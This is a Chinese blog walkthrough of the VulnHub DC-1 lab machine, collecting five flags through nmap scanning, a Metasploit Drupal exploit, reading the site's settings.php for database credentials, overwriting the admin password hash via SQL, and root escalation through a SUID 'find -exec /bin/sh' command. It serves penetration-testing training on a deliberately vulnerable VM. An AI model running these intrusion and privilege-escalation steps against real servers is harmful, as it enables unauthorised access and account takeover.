DC系列靶机-DC1

于 2024-10-10 14:40:10 发布
阅读量238 收藏 6
点赞数 4
文章标签: linux 运维 服务器 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76717406/article/details/142814594
版权

一,环境搭建

VM17   官网下载kali 2023.4版  https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2023.4/靶场文件  https://download.vulnhub.com/dc/DC-1.zip

首先下载所需的靶机环境;安装好工具(kali);

解压之后直接在VMware中打开即可;

二,攻略(拿到出题人隐藏的5个flag)

1,flag1

主机发现;

首先将靶机的网络模式设置为NAT模式;

查看其MAC地址:00:0C:29:EF:FE:9E

本机(kali)IP:192.168.20.151

进行主机发现;

nmap -sP 192.168.20.1/24

可知靶机IP;

靶机IP:192.168.20.142

端口扫描;

nmap --top-ports 100 192.168.20.142

对常用的端口进行扫描;

发现开放了三个可以利用的端口;

从80端口入手,在浏览器中进行访问;

出现一个登录框;

可以看到这是Drupal框架(审查元素可以发现是Drupal 7)搭建的一个网站;

使用msf搜索一个相关的漏洞;

msfconsole
search drupal

这里利用第一个;

接下来设置靶机的IP;

set RHOSTS 192.168.20.142

接下来开始利用;

exploit

发现建立连接成功;

输入shell;

python -c "import pty;pty.spawn('/bin/bash')"

这样就拿到了flag1;

2,flag2

flag1提示我们去找配置文件,上百度查询drupal的配置文件在哪里;

在/var/www/sites/default这个目录下发现了配置文件;

配置文件是settings.php

这样 就拿到了flag2;

3,flag3

在上述的配置文件中找到一段操作数据库的php代码;

而flag2提示连接一下数据库;

说明数据库连接成功;

首先查看数据库;

接着查看表;

发现一个users表;

在表内发现2条数据;

存在admin的账号和密码;

这样常看更加清晰;

所有的账号密码被加密而且加盐,无法暴力破解;

可以使用自己的生成的密码来替换掉这个admin的密码;

将admin的密码进行替换;

update users set pass="$S$DTFrrMt2PEr1kXyhAApF6XT7NjxUrzqFac.rjtM30wSOswRHLt87" where name="admin";

将自己的密码进行替换;

然后登录之前发现的页面;

登录成功发现是admin账户;

登陆成功,拿到flag3;

4,flag4

根据flag3的提示,要使用find提取;

接下来查看/etc/passwd

拿到第四个flag;

5,flag5

然后find提权;

find / -perm -u=s -type f -exec ls -la {} \; 2>/dev/null
www-data@DC-1:/var/www$ cd /tmp
cd /tmp
www-data@DC-1:/tmp$ touch test
touch test
www-data@DC-1:/tmp$ find test -exec "/bin/sh" \;
find test -exec "/bin/sh" \;
# whoami
whoami
root

通常选择在tmp目录下操作,因为tmp目录大多数用户都可以进行操作;

这样提权成功;

在root目录下拿到最终的flag;

至此,DC系列的第一个靶机就完成了;

慕舟舟.
关注
vulnhub靶机-DC1-Writeup
liuhanzhe的专栏
12-08 1173
vulnhub靶机-DC1-writeup
靶机-DC1通关全过程
认真走好每一小步
06-18 221
find / -perm -4000 2>/dev/null find搜索,/根下 -perm 查权限 4000代表root权限,使用此条命令可以看到以下命令临时具有管理员权限。pty.spawn("/bin/bash")' 没有通道,调用模块pty终端的模块,pty.spawn的属性。nmap -sP 192.168.153.0/24 (-sP 快速扫描ip)#认真走好每一小步 请多指教。RHOST 是设置被攻击者ip。LHOST 是设置攻击者ip。LPORT 自行设置端口。
Vulnhub靶场 | DC系列 - DC1
哦 卷!
07-13 1231
发现该网站是 drupal[//]: # (Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。根据上面flag1.txt的提示,在网站目录中寻找相应的配置文件(当然没有提示,也应该寻找看一下,毕竟是敏感文件)。,则需要登录flag4用户。查看 users 表中的内容:由于列数比较多,查看内容比较乱,可以使用。尝试查看flag4用户的家目录,确实存在flag4.txt文件,
DC靶场系列--DC1
BGiscool的博客
06-28 5050
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
DC1--靶机实操详解
qq_61802750的博客
08-02 595
111端口是一个rpcbind 2-4服务,这个服务存在一个漏洞,该漏洞可使攻击者在远程rpcbind绑定主机上分配任意大小的内存(每次攻击最高可达4GB),除非进程崩溃,或者管理员挂起/重启rpcbind服务,否则该内存不会被释放;特殊的 PERMS 将帮助找到 passwd - 但您需要 -exec 该命令来弄清楚如何获取隐藏中的东西。使用Drupal对数据库的加密方法,生成一个新密码,然后把新的密码更新到admin用户。一个是修改admin的密码,一个是增加一个admin权限的用户。
DC系列-dc1靶机解析
qq_53309677的博客
11-06 136
Drupal的默认配置文件为 /var/www/sites/default/settings.php,查看。此时我们查看 /etc/passwd 文件,发现存在 flag4 用户,我们也可以使用。发现了flag2和数据库的账号密码,flag2提示,提升权限为root来查看敏感文件,或者直接爆破。flag3提示,提权并提示 -exec,想到suid提权 find 命令。继续查找敏感文件,发现flag1.txt,内容提示寻找站点的配置文件。查看flag4用户的flag。使用python显示交互。
vulnhub靶机-DC系列-DC-1
qq_45953122的博客
08-08 407
DC-1详解
Vulnhub渗透靶机系列----DC1
m0_67284865的博客
08-15 76
vulnhub详细解析步骤,vulnhub渗透靶机系列--DC1
渗透测试学习之vulnhub系列靶机——DC1
jingzhou_666的博客
06-09 1873
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,使用VMware即可直接运行。Drupal 是一个灵活的,基于 LAMP 技术栈的 CMS,它的模块化设计,允许通过安装和卸载模块的方式 添加和移除功能,同时,允许通过安装和卸载主题改变整个网站的视觉感观。在kali当中使用msf查看一下针对这个cms有哪些具体的模块可以使用使用模块弹出 meterpreter >代表利用成功可以继续进行后渗透3、漏洞利用。
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
DC靶机渗透系列DC1-DC3)
居上
07-01 774
收获 DC1 回顾了metasploit的一些用法 利用已知cms的exp来getshell hashcat爆破用法 find提权 DC2 cewl根据网页内容生成字典 wpscan结合cewl跑账号和密码 用metasploit的模块来ssh爆破 rbash->bash--------vim逃逸 git提权 DC3 searchsploit的一些用法 在github上搜罗cms探测脚本 john爆破用法 页面模板里添加一句话木马 使用Python开启SimpleHTTPServer 公开的
【2024版】最新kali linux入门及常用简单工具介绍(非常详细)零基础入门到精通,收藏这一篇就够了_kalilinux
weixin_57514792的博客
10-07 1183
最新kali linux入门及常用简单工具介绍
黑马linux笔记(转载)
pscool的博客
10-01 2136
我们所熟知的计算机是由硬件和软件组成的。计算机系统中由电子、机械和光电元件等组成的各种物理装置的总称。(看的见、摸得着的东西:CPU、内存硬盘、显示屏、鼠标等)是用户和计算机硬件之间的接口和桥梁,用户通过软件和计算机进行交流。(操作系统,就是软件的一类)学习Linux系统,就需要有一个可用的Linux系统。由于Linux系统并不适合日常办公使用,所以我们需要借助虚拟机来获得可用的Linux系统环境进行学习。借助虚拟化技术,我们可以在系统中,通过软件:模拟计算机硬件,并给虚拟硬件安装真实的操作系统。
linux之curl
qq_41081716的博客
10-06 405
发送指定的数据作为POST请求的主体。数据可以是键值对的形式。: 添加自定义HTTP头部。可以多次使用以添加多个头部。: 用于发送表单数据,特别是文件上传。: 指定请求方法,例如。
Linux中定时删除10天前的日志文件
最新发布
pcj_888的博客
10-09 440
如题
linux中的硬链接和软链接
jkzyx123的博客
10-08 359
内容共享:硬链接共享inode,因此所有硬链接和原文件共享同样的内容;而软链接有自己的inode,不直接包含任何数据,仅包含所指向文件的路径。删除行为:删除最后一个硬链接或原文件之前,数据仍然存在;而一旦删除了软链接的目标文件,软链接就失效了。跨文件系统:硬链接不能跨文件系统;软链接可以。链接对象:硬链接不能用于目录;软链接既可以用于文件也可以用于目录。占用空间:硬链接不额外占用空间;软链接占用少量空间来存放路径信息。理解这些差异可以帮助你更好地选择合适的链接类型来满足特定需求。
Linux】使Ubuntu自适应窗口大小并与主机共享文件
Frost_Descent的博客
10-04 469
VMware Tools™ 是一组服务和模块,是VMware公司在其虚拟化平台中提供的一套工具集,旨在提高虚拟机的性能和稳定性。它包含多个组件,如设备驱动程序、文件共享功能、时间同步功能、屏幕分辨率调整功能、剪贴板共享功能等。这些组件共同作用,可以显著提升虚拟机的性能和效率,增强虚拟机的安全性和管理能力。重启后,虚拟机可以自适应VMware Workstation窗口大小并可以在电脑与虚拟机间共享文件。在虚拟机桌面右键调出菜单,选择Open In Terminal(Ctrl+Alt+t)
VirtualBox Ubuntu22.04 NOI linux2.0 Terminal无法打开 终端打不开 两步解决法儿
10-07 275
CTRL + ALT + F3 进入命令行模式(需要返回桌面时CTRL + ALT + F1)把文件中的 “en_US” 改成 “en_US.UTF-8”也可以 vim /etc/default/locale。reboot 重启虚拟机。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

慕舟舟.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值